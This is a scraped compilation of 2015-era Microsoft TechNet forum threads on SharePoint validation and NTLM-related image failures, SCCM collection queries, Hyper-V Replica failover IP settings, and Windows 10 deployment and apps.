alert("Please input a last name");
}
else if(age.length === 0)
{
alert("Please input an age");
}
});
});
------------------------------------
Reply:
Thank you Sudeep for the work around.
But this does not serve my purpose . My question is I wanted to use Required Field Validator which is present by default in Site Column which when creating is asked ( Required Field and we say "yes").
This problem is already marked by someone. Can we have document or link showing that this is fixed in the July CU?
------------------------------------
Images/Thumbs randomly fail to load on a Sharepoint community site members-webpart
Hi all,
I'd like to share a solution I found out myself. Maybe there are other people troubleshooting this and maybe this thread will help.
PROBLEM:
I have a SharePoint community site, on which a member-webpart is placed, showing all profile pictures in a small layout. Randomly, some profile pictures show a black cross. After pressing F5, the pictures reappear or other pictures at once are also showing black crosses.
I've looked everywhere on the internet, but I wasn't able to find a good answer.
MY SOLUTION:
My authentication provider was NTLM, NTLM is limited default to 2 connections max, causing the server to generate 401 HTTP status codes when a user profile image is requested and thus not showing the pic. After I changed NTLM authentication to Kerberos authentication (as shown in this guide) the problem was fixed.
I hope this helps someone, and sorry for my broken english, I'm a dutchie :)
- Changed type Victoria Xia Monday, May 4, 2015 8:08 AM not a question
Reply:
Hi,
Thank you for sharing this with us, and it will help others who have met with this issue.
I will change this thread type to discussion as it is not an question, more people can join to this topic and share their opinions.
Best regards,
Victoria
TechNet Community Support
Please remember to mark the replies as answers if they help, and unmark the answers if they provide no help. If you have feedback for TechNet Support, contact tnmff@microsoft.com.
------------------------------------
Microsoft product future releases
Where can i find information about Microsoft production future releases announcements? I googled it, seems that information are not clear? Can anyone shed some light on this?
- Changed type MedicalSMicrosoft contingent staff Tuesday, May 12, 2015 3:33 AM
Reply:
You could find Microsoft production future releases announcements in Microsoft Team Blogs. You can expect to find important announcements and details of Microsoft news, product releases, service packs and important support issues.
http://blogs.technet.com/b/blogms/
Best Regards,
Mandy
Please remember to mark the replies as answers if they help and unmark them if they provide no help. If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.
------------------------------------
Create a software collection using installed application history attribute
Hello,
I'm trying to use device collection query to get a list of computers that have a specific software (Application A) not installed on Apr 16. So i would create a criteria with:
Installed application (x64) history > Display Name. Set string to "Application A"
Installed application (x64) history > Installed Date. Set Installed Date to "is no equal to" 20150416.
When i query the collection it should list all systems with all version of application A not installed on Apr 16. However, it ends up showing only Application A installed on Apr 16.
Reply:
you can try sub selected quires using Not IN Condition menans first get list of computers that have Application A with installed date 20150416 and sub selected query to get rest of the computers that have Application A . More via http://eskonr.com/2011/12/sccm-collection-sub-selected-quiries/
http://blogs.msdn.com/b/muaddib/archive/2008/10/10/sub-select-query-the-holy-grail-of-sms-collections.aspx
Eswar Koneti | Configmgr Blog: www.eskonr.com | Linkedin: Eswar Koneti | Twitter: eskonr
------------------------------------
Hyper-V Replica Server Implementation
Have created Hyper-V Replica server for most critical VM's using Windows 2012 Datacenter. Basically there are two primary servers and one replica server. Some of the VM's will be replicated through it
there are some confusions which need to be cleared
1. After Replication is completed the IP address are not configured on the Replica Server, it should be the same as Primary Server. What if the same IP address is manually assigned on VM (Replica Server)
2. During Unplanned Failover will the same IP Address is automatically assigned to VM on Replica Server
3. why is HRL or AVHD file created in the VM's folder which replication is enabled on VM
Reply:
First you have to get a full understanding how Hyper-V Replica works in detials
here you find one good blog http://www.altaro.com/hyper-v/how-hyper-v-replica-actually-works/
or
http://www.aidanfinn.com/?p=12147
and the short answers to your questions
1. the IP config in the replica vm is the same as in the source vm, if it is dhcp there it stays on dhcp, if you configured a fixed it is the same fixed ip after Failover, the config on the replica server you set if you want the vm having a different one after Failover, e.g. you do not have the same ip subnet on your DR Site
2. see 1. , unplanned means you start the replica VM manual and it gets the same config as the source
3. the AVHD or Snapshot is created on the initial replication, should be gone after that step is done, and the HRL is your Hyper-V replica log File where the changes on the source go to and this gets replicated to the Destination and merged into the Disk File there.
makes sense ?
------------------------------------
Reply:
While doing planned failover the IP Addess is assigned but NIC is unplugged from the network. Why is this behaviour1. the IP config in the replica vm is the same as in the source vm, if it is dhcp there it stays on dhcp, if you configured a fixed it is the same fixed ip after Failover, the config on the replica server you set if you want the vm having a different one after Failover, e.g. you do not have the same ip subnet on your DR Site
------------------------------------
Solution for issue deploying newer Win10 builds via SCCM 2012 OSD
FYI,
The latest builds seem to have issues deploying with SCCM OSD because the WUA 3.0 agent returns an error 775. I've come up with a fix for this in the form of a wrapper for the SCCM client:
https://social.technet.microsoft.com/Forums/en-US/8741c693-d081-4b68-bb0f-d5a0be98bf9a/unable-to-install-sccm-2012-client-in-win10-build-10061?forum=configmanagerdeployment
Hopefully this will save some people some time.
- Changed type Karen HuModerator Wednesday, May 13, 2015 6:58 AM
Reply:
Hi,
Thank you for sharing your solutions and experience here. It will be very beneficial for other community members who have similar questions.
Please remember to mark the replies as answers if they help, and unmark the answers if they provide no help. If you have feedback for TechNet Support, contact tnmff@microsoft.com.
------------------------------------
Replace original "Xbox Music" with the preview version…
NOTE: I'm not currently using Insider Preview.
According to the article on Xbox Support:
The Music Preview app is now available for the desktop version of Windows 10 Technical Preview.
How to find the app
Search for "Music Preview" in the Store to find the app. You'll still have the standard Music app installed and can continue using it until the Music Preview app is fully featured and ready to go.
In the next build, can you replace the original Xbox Music app (not Windows Media Player) with the preview version of it? Thanks.
Reply:
Music Preview app and Video Preview app is pre-installed on Windows 10 TP Build 10074.
you can locate them on app apps list.
------------------------------------
Reply:
Oh, I see.Music Preview app and Video Preview app is pre-installed on Windows 10 TP Build 10074.
you can locate them on app apps list.
------------------------------------
No comments:
Post a Comment